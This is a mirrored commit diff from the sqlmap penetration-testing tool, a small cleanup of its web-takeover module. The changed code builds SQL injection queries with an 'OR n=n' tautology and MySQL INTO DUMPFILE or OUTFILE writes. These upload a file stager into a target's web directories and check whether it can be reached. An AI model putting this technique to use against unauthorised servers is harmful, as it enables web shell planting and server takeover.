sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-03 20:53:26 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor code cleanup and bug fix

Browse Source
This commit is contained in:
Bernardo Damele 2014-03-21 11:35:30 +00:00
parent c211255773
commit 8091a88d3e
1 changed files with 5 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/takeover/web.py
View File

@ -139,7 +139,7 @@ class Web:
randInt = randomInt() randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt) query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", DUMPFILE=outFile, HEXSTRING=hexencode(uplQuery)) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query) query = agent.prefixQuery(query)
query = agent.suffixQuery(query) query = agent.suffixQuery(query)
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
@ -206,6 +206,8 @@ class Web:
success = False success = False
for directory in directories: for directory in directories:
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
if success: if success:
break break
@ -219,15 +221,13 @@ class Web:
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE technique # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE technique
infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT INTO DUMPFILE technique" infoMsg += "via LIMIT INTO 'LINES TERMINATED BY' technique"
logger.info(infoMsg) logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory) self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory): for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg) logger.debug(debugMsg)
@ -259,13 +259,9 @@ class Web:
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
for match in re.finditer('/', directory): for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg) logger.debug(debugMsg)
@ -277,10 +273,10 @@ class Web:
uploaded = True uploaded = True
break break
# Extra check - required
if not uploaded: if not uploaded:
self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port) self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg) logger.debug(debugMsg)